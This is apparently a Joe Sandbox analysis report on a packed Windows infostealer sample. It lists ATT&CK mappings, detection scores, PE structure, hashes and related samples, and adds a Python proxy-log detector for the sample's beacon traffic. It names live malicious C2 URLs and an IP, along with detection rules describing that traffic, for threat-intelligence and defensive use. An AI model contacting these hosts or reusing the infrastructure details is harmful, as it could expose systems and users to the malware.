MITRE ATT&CK matrix (the number after a technique is the count of matched signatures; entries without a count are the empty cells of the standard matrix template)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (23); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (741); Virtualization/Sandbox Evasion (23); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (4); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
joE9s9sbv0.exe | 49% | Virustotal |
joE9s9sbv0.exe | 57% | ReversingLabs | Win32.Infostealer.Tinba
joE9s9sbv0.exe | 100% | Avira | TR/Crypt.TPM.Gen
joE9s9sbv0.exe | 100% | Joe Sandbox ML |
No Antivirus matches (dropped files, unpacked PE files, domains)

Source | Detection | Scanner | Label
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl | 100% | Avira URL Cloud | malware
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0 | 100% | Avira URL Cloud | malware
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963 | 100% | Avira URL Cloud | malware
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4 | 100% | Avira URL Cloud | malware
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17 | 100% | Avira URL Cloud | malware
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737 | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5vs.top | 176.53.146.223 | true | false | | high
httpbin.org | 34.200.57.114 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0 | true | Avira URL Cloud: malware | unknown
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737 | true | Avira URL Cloud: malware | unknown
https://httpbin.org/ip | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://httpbin.org/ipbefore | joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | joE9s9sbv0.exe, joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl | joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/hsts.html# | joE9s9sbv0.exe | false | | high
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963 | joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17 | joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4 | joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/alt-svc.html | joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
176.53.146.223 | home.fiveth5vs.top | United Kingdom | 35791 | VANNINVENTURES (GB) | false
34.200.57.114 | httpbin.org | United States | 14618 | AMAZON-AES (US) | false
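The network indicators above show the sample resolving home.fiveth5vs.top (176.53.146.223, AS35791), fetching its own public address from https://httpbin.org/ip, and talking plain HTTP on port 80 to /KhxTILlSHLygUudVWlQk1735537737?argument=0 and to two variants of the same path with a short hex suffix. The curl.se documentation URLs in memory are libcurl's embedded help strings, so the sample links libcurl; libcurl sends no User-Agent header unless the caller sets one, which is consistent with the "HTTP GET or POST without a user agent" signature in the summary. The trailing digits of the path token parse as the Unix timestamp 2024-12-30 05:48:57 UTC, the day before this analysis, and the same token appears for the two related samples in the context section; whether it is a build or a campaign identifier is not something the report shows. The Python below is an added example for this corpus, not code from the report or the sample: it applies an IOC rule for the recorded host, IP and path, and a behavioural rule for an external-IP lookup followed within a short window by a User-Agent-less request from the same client to a host that is not allowlisted. That the lookup precedes the beacon, the 60-second window, the allowlist, the log format and the log lines are assumptions constructed for the example.

```python
"""Proxy-log detection for the beacon pattern in this report.

Added example for this corpus, not code from the report or the sample.
Rule 1 matches the C2 host, IP and URL path the report records. Rule 2
matches the shape of the traffic: an external-IP lookup at httpbin.org/ip
followed shortly by a request with no User-Agent to a non-allowlisted host.
"""
from typing import Dict, List, Tuple

# Indicators from the report's network section.
KNOWN_C2_HOSTS = {"home.fiveth5vs.top", "176.53.146.223"}
KNOWN_C2_PATH_PREFIX = "/KhxTILlSHLygUudVWlQk1735537737"
IP_CHECK_HOSTS = {"httpbin.org"}
# Hosts that legitimately receive User-Agent-less requests from this fleet
# (assumption for the example; tune per environment).
ALLOWLIST = {"httpbin.org", "ctldl.windowsupdate.com"}

# Constructed log format: "<unix_ts> <client> <method> <host> <path> <user_agent|->"
# The lines are constructed for the example; only the host, IP and path are
# taken from the report.
LOG = """\
1735648810 10.0.0.7 GET httpbin.org /ip -
1735648812 10.0.0.7 POST home.fiveth5vs.top /KhxTILlSHLygUudVWlQk1735537737?argument=0 -
1735648813 10.0.0.7 GET home.fiveth5vs.top /KhxTILlSHLygUudVWlQk17355377376963 -
1735648900 10.0.0.9 GET httpbin.org /ip curl/8.4.0
1735649000 10.0.0.9 GET www.example.com / Mozilla/5.0 (Windows NT 10.0; Win64; x64)
"""


def parse(log_text: str) -> List[Dict]:
    """Split the constructed log into records; '-' means no User-Agent header."""
    records = []
    for line in log_text.strip().splitlines():
        ts, client, method, host, path, ua = line.split(" ", 5)
        records.append({"ts": int(ts), "client": client, "method": method,
                        "host": host, "path": path,
                        "ua": None if ua == "-" else ua})
    return records


def detect(log_text: str, window_s: int = 60) -> List[Tuple[str, str, str]]:
    """Return (client, rule, url) alerts in time order."""
    alerts = []
    last_ip_check: Dict[str, int] = {}  # client -> time of last external-IP lookup
    for r in sorted(parse(log_text), key=lambda rec: rec["ts"]):
        url = r["host"] + r["path"]
        # Rule 1: static indicators from the report.
        if r["host"] in KNOWN_C2_HOSTS or r["path"].startswith(KNOWN_C2_PATH_PREFIX):
            alerts.append((r["client"], "ioc_match", url))
        # Remember the external-IP lookup; it is not an alert by itself.
        if r["host"] in IP_CHECK_HOSTS and r["path"].startswith("/ip"):
            last_ip_check[r["client"]] = r["ts"]
            continue
        # Rule 2: header-less request soon after the lookup, to a host we do
        # not expect to be contacted without a User-Agent.
        t0 = last_ip_check.get(r["client"])
        if (r["ua"] is None and t0 is not None
                and r["ts"] - t0 <= window_s and r["host"] not in ALLOWLIST):
            alerts.append((r["client"], "ip_check_then_ua_less_request", url))
    return alerts


if __name__ == "__main__":
    for client, rule, url in detect(LOG):
        print(f"{client:10} {rule:32} {url}")
```

The behavioural rule is the one worth keeping: the host and the path token change with the next build, while an IP lookup followed by a header-less request from the same client is the shape of this traffic and also catches the related samples listed under the same ASN.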
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582827
Start date and time: 2024-12-31 15:40:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: joE9s9sbv0.exe (renamed because the original name is a hash value)
Original Sample Name: 2ce78ac3287a074e14bd8b4af226fd09.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        No simulations
Context: IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.53.146.223 | JbN2WYseAr.exe | malicious | Unknown | home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
176.53.146.223 | ivHDHq51Ar.exe | malicious | Unknown | home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
34.200.57.114 | Bo6uO5gKL4.exe | malicious | Unknown |
34.200.57.114 | JbN2WYseAr.exe | malicious | Unknown |
34.200.57.114 | r8nllkNEQX.exe | malicious | Unknown |
34.200.57.114 | ivHDHq51Ar.exe | malicious | Unknown |

Context: domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.fiveth5vs.top | JbN2WYseAr.exe | malicious | Unknown | 176.53.146.223
home.fiveth5vs.top | ivHDHq51Ar.exe | malicious | Unknown | 176.53.146.223
httpbin.org | Bo6uO5gKL4.exe | malicious | Unknown | 34.200.57.114
httpbin.org | JbN2WYseAr.exe | malicious | Unknown | 34.200.57.114
httpbin.org | r8nllkNEQX.exe | malicious | Unknown | 34.200.57.114
httpbin.org | yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172
httpbin.org | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
httpbin.org | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
httpbin.org | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
httpbin.org | Set-up.exe | malicious | Unknown | 52.202.253.164
httpbin.org | Set-up.exe | malicious | Unknown | 34.197.122.172
httpbin.org | Set-up.exe | malicious | Unknown | 52.73.63.247

Context: ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VANNINVENTURES (GB) | JbN2WYseAr.exe | malicious | Unknown | 176.53.146.223
VANNINVENTURES (GB) | ivHDHq51Ar.exe | malicious | Unknown | 176.53.146.223
VANNINVENTURES (GB) | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 176.53.146.212
VANNINVENTURES (GB) | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | 176.53.146.212
VANNINVENTURES (GB) | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | 176.53.146.212
VANNINVENTURES (GB) | s3hvuz3XS0.exe | malicious | Cryptbot | 176.53.146.212
VANNINVENTURES (GB) | 65AcuGF7W7.exe | malicious | Cryptbot | 176.53.146.212
VANNINVENTURES (GB) | 9nYVfFos77.exe | malicious | Clipboard Hijacker, Cryptbot | 176.53.146.212
VANNINVENTURES (GB) | ovQrwYAhbq.exe | malicious | Clipboard Hijacker, Cryptbot | 176.53.146.212
VANNINVENTURES (GB) | Sh2uIqqKqc.exe | malicious | Cryptbot | 176.53.146.212
AMAZON-AES (US) | Bo6uO5gKL4.exe | malicious | Unknown | 34.200.57.114
AMAZON-AES (US) | JbN2WYseAr.exe | malicious | Unknown | 34.200.57.114
AMAZON-AES (US) | r8nllkNEQX.exe | malicious | Unknown | 34.200.57.114
AMAZON-AES (US) | yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172
AMAZON-AES (US) | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
AMAZON-AES (US) | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
AMAZON-AES (US) | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
AMAZON-AES (US) | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 44.221.84.105
AMAZON-AES (US) | http://ghostbin.cafe24.com/ | malicious | Unknown | 44.199.56.69
AMAZON-AES (US) | Set-up.exe | malicious | Unknown | 52.202.253.164
No context
                                No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.985166937535761
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: joE9s9sbv0.exe
File size: 4'508'160 bytes
MD5: 2ce78ac3287a074e14bd8b4af226fd09
SHA1: 58500a1a439de84a870031062dd51e7cae982987
SHA256: 942897e237bc3ab9b597d9258e2541730d2192b957ea21c6242dc373b42dbc8f
SHA512: 1b403b7937bd6a32ed8a78bd29794b280f953a7ba222d64d9ef7359107f7d844ae66dbd432375eabf1837405bd700e2bad22af574fedb9f66c789db6d8419205
SSDEEP: 98304:kXIT2VmtAS1S0vAiEXRAcd6+7d+kFod8iO5SP34mzaNGfec:kYT0mvfv/nc7Qd8iO5oImzaE
TLSH: 9C2633B4392E07D0C399FF38CEC9F67EF5DD848BAF640866230925A76F299D4C585620
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..K...s..2...P........K...@.................................iAE...@... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x1065000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x677235C7 [Mon Dec 30 05:55:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Signature Valid: false
Signature Issuer: CN=OREANS TECHNOLOGIES CA, O=OREANS TECHNOLOGIES, C=SP
Signature Validation Error: No signature was present in the subject
Error Number: -2146762496
Not Before: 12/03/2017 01:00:00
Not After: 11/03/2027 00:59:59
Subject Chain:
• O=Oreans Technologies, CN=OR_K2D9KO
Version: 3
Thumbprint MD5: 01A75B245DFCAB6F7C3A64135498D62E
Thumbprint SHA-1: A7FE65FCA4ABC43321CA417DED1C0E80A7E197F4
Thumbprint SHA-256: CDCB5C36CEFC4964D5DA873972A9F41FB95AAE466A6FA60373FB465E3A1B20D6
Serial: 1E66BD7151D9C6B3B3C30CBA7265C6B2
                                Instruction
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x70505f        | 0x73         | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x704000        | 0x1ac        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x730800        | 0x688        |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xc631bc        | 0x10         | wxhzupjp
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0xc6316c        | 0x18         | wxhzupjp
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x703000 | 0x289a00 | 76b556a52b72eae0e7d64973e164ce36 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x704000 | 0x1ac | 0x200 | e3c5e9f886d41ae9ade2ffe93c2729c4 | False | 0.58203125 | data | 4.58681860347337 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x705000 | 0x1000 | 0x200 | 0ff3b278c147647c2093aaa19ab35725 | False | 0.166015625 | data | 1.1569718486953509 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x706000 | 0x39e000 | 0x200 | bebf0bb21c4e1bab282e64d36391b7ba | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wxhzupjp | 0xaa4000 | 0x1c0000 | 0x1bf400 | 495a333290b229659cf211662031d4d5 | False | 0.9946275415735047 | data | 7.955910297498214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vxbexiem | 0xc64000 | 0x1000 | 0x400 | 9fdd457bbb84fcaae6cffa6b7de87676 | False | 0.8017578125 | data | 6.313583530717228 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc65000 | 0x3000 | 0x2200 | 37c5ac3dc03b7371d417afb51bee7891 | False | 0.41153492647058826 | DOS executable (COM) | 4.366482767704596 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc631cc | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402

DLL | Import
kernel32.dll | lstrcpy


                                • Total Packets: 76
                                • 443 (HTTPS)
                                • 80 (HTTP)
                                • 53 (DNS)
                                Dec 31, 2024 15:42:07.085330009 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085347891 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085365057 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085374117 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085407972 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085417032 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085458040 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085468054 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085510969 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085520983 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085557938 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085575104 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085598946 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085608959 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085624933 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085633993 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085665941 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085675955 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085700989 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085711002 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085738897 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085747957 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085774899 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085784912 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085812092 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085820913 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088417053 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088429928 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088536024 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088546991 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088556051 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088565111 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088577032 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088587046 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.090399981 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:07.090492964 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:07.095383883 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095397949 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095416069 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095426083 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095443964 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095463991 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095480919 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095490932 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095525026 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095535040 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095585108 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095594883 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095623970 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095633984 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095662117 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095679045 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095768929 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095779896 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095810890 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095819950 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095906019 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095916986 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095935106 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095943928 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095959902 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095978022 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095993996 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096004009 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096082926 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096101046 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096111059 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096118927 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096136093 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096146107 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096177101 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096185923 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096251011 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096260071 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096288919 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096298933 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096324921 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096333981 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096360922 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096379042 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096405029 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096415043 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096424103 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096458912 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096476078 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096484900 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096508026 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096517086 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096525908 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.099442959 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:07.099526882 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:07.104408979 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104427099 CET8049705176.53.146.223192.168.2.10
